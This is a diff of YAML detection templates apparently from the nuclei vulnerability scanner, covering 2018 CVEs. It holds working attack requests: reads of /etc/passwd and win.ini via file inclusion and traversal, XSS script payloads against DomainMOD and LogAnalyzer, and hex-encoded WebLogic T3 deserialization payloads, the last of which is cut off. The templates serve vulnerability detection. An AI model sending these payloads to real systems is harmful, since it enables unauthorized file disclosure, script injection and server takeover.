a/nuclei-templates/CVE-2018/cve-2018-19458.yaml b/nuclei-templates/CVE-2018/cve-2018-19458.yaml new file mode 100644 index 0000000000..ab49b9ff30 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19458.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-19458 + +info: + name: PHP Proxy 3.0.3 - Local File Inclusion + author: daffainfo + severity: high + description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246. + reference: + - https://www.exploit-db.com/exploits/45780 + - https://www.cvedetails.com/cve/CVE-2018-19458 + tags: cve,cve2018,lfi,proxy + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-19458 + cwe-id: CWE-287 + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?q=file:///etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-19752.yaml b/nuclei-templates/CVE-2018/cve-2018-19752.yaml deleted file mode 100644 index f5d120debe..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19752.yaml +++ /dev/null @@ -1,69 +0,0 @@ -id: CVE-2018-19752 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. - reference: - - https://github.com/domainmod/domainmod/issues/84 - - https://www.exploit-db.com/exploits/45949/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19752 - cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39112 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb - -http: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/registrar.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test - - | - GET /assets/registrars.php HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 4a0a004730450220233adb77a26a1b91da079bdf0eb8b3aae6997e9e8eafc1246a94b187acbcf10e022100cc16f3f453b69215c3af952bc5f242abcd26f8e2c38445664464564ddb39f26d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19877.yaml b/nuclei-templates/CVE-2018/cve-2018-19877.yaml new file mode 100644 index 0000000000..860a40a6b3 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19877.yaml @@ -0,0 +1,53 @@ +id: CVE-2018-19877 + +info: + name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade Adiscon LogAnalyzer to version 4.1.7 or later to mitigate this vulnerability. + reference: + - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/ + - https://www.exploit-db.com/exploits/45958/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-19877 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-19877 + cwe-id: CWE-79 + epss-score: 0.00241 + epss-percentile: 0.63554 + cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: adiscon + product: loganalyzer + tags: cve,cve2018,adiscon,xss,edb + +http: + - method: GET + path: + - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'value="">' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a0047304502210085b48bbdf595b702ebec999f9e07ec650e2ca0276e09d9ab926467143c087d0d022063857749f628ad5e3d598a8e17fa18c4708545c2196caebf9b7505e171159d66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19914.yaml b/nuclei-templates/CVE-2018/cve-2018-19914.yaml deleted file mode 100644 index 7e5a3adf5f..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19914.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: CVE-2018-19914 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade to the latest version of DomainMOD or apply the necessary patches to fix the XSS vulnerability. - reference: - - https://www.exploit-db.com/exploits/46375/ - - https://github.com/domainmod/domainmod/issues/87 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19914 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19914 - cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.50703 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb - -http: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/dns.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E - - | - GET /assets/dns.php HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(header_3, "text/html")' - - 'contains(body_3, ">")' - condition: and -# digest: 4a0a00473045022100ad4d510c1ce185b5e401199a825d93783a0f561aa134a108265d89f119b1d1750220431ecb234bab21342ca9f250c34c079cce22eeeffd6f278fcb778923f3661b2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-20010.yaml b/nuclei-templates/CVE-2018/cve-2018-20010.yaml new file mode 100644 index 0000000000..90d48ccdab --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-20010.yaml @@ -0,0 +1,60 @@ +id: CVE-2018-20010 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/46373/ + - https://github.com/domainmod/domainmod/issues/88 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20010 + cwe-id: CWE-79 + epss-score: 0.00153 + epss-percentile: 0.50703 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve,cve2018,domainmod,xss,authenticated,edb + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/ssl-provider-account.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes= + - | + GET /assets/ssl-accounts.php HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(header_3, "text/html")' + - 'contains(body_3, ">")' + condition: and +# digest: 4b0a00483046022100c634c1d3655ae86d99caaad29c7f5a5d4ef4d696601e6b952bb796b1326800c7022100f409497a17e56982fb3e63e4424b98b22222eeb4b224a7647417f3220245c8cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-20011.yaml b/nuclei-templates/CVE-2018/cve-2018-20011.yaml deleted file mode 100644 index fe65c778d6..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-20011.yaml +++ /dev/null @@ -1,60 +0,0 @@ -id: CVE-2018-20011 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. - reference: - - https://www.exploit-db.com/exploits/46374/ - - https://github.com/domainmod/domainmod/issues/88 - - https://nvd.nist.gov/vuln/detail/CVE-2018-20011 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20011 - cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.50703 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb - -http: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/category.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes= - - | - GET /assets/categories.php HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(header_3, "text/html")' - - 'contains(body_3, ">")' - condition: and -# digest: 490a0046304402206c740f13dea0b88d62e8f6cac876937c9522029b8222a3b548752237227d881b022033a65cc2e73acb43e2e310d063cef73c545e294c9587f18f385a32e4af343a46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-20470.yaml b/nuclei-templates/CVE-2018/cve-2018-20470.yaml deleted file mode 100644 index 15ee6fd76f..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-20470.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-20470 - -info: - name: Sahi pro 7.x/8.x - Directory Traversal - author: daffainfo - severity: high - description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files. - reference: - - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - - https://www.cvedetails.com/cve/CVE-2018-20470 - tags: cve,cve2018,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2018-20470 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - part: body diff --git a/nuclei-templates/CVE-2018/cve-2018-2628.yaml b/nuclei-templates/CVE-2018/cve-2018-2628.yaml new file mode 100644 index 0000000000..6ea92ada0e --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-2628.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-2628 + +info: + name: Oracle WebLogic Server Deserialization RCE + author: milo2012 + severity: critical + description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-2628 + cwe-id: CWE-502 + tags: cve,cve2018,oracle,weblogic,network,deserialization + +network: + - inputs: + - data: "{{hex_decode('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')}}" + read: 1024 + - data: "{{hex_decode('000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078')}}" + read: 1024 + - data: "{{hex_decode('000003ad056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707729000a556e69636173745265660000000005a2000000005649e3fd00000000000000000000000000000078fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff')}}" + read: 1024 + + host: + - "{{Hostname}}" + + read-size: 1024 + matchers: + - type: regex + regex: + - "\\$Proxy[0-9]+" diff --git a/nuclei-templates/CVE-2018/cve-2018-2791.yaml b/nuclei-templates/CVE-2018/cve-2018-2791.yaml deleted file mode 100644 index 3b9ac98e97..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-2791.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2018-2791 - -info: - name: Oracle WebCenter Sites Multiple XSS - author: madrobot,leovalcante - severity: high - description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N - cvss-score: 8.20 - cve-id: CVE-2018-2791 - reference: - - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html - - http://www.securitytracker.com/id/1040695 - - http://www.securityfocus.com/bid/103800 - - https://www.exploit-db.com/exploits/44752/ - - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - tags: cve,cve2018,oracle,xss,wcs - -requests: - - raw: - - | - GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{BaseURL}} - - - | - GET /cs/Satellite?destpage="&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1 - Host: {{BaseURL}} - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: body - words: - - '/graphics/common/screen/dotclear.gif' - - - type: word - part: body - words: - - '' - - 'Missing translation key' - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-2893.yaml b/nuclei-templates/CVE-2018/cve-2018-2893.yaml new file mode 100644 index 0000000000..94bfcc5ead --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-2893.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-2893 + +info: + name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893) + author: milo2012 + severity: critical + description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). + reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-2893 + tags: cve,cve2018,weblogic,network,deserialization,rce,oracle + +network: + - inputs: + + - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + read: 1024 + - data: "000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078" + type: hex + read: 1024 + - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" + type: hex + read: 1024 + - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c00007870770206007372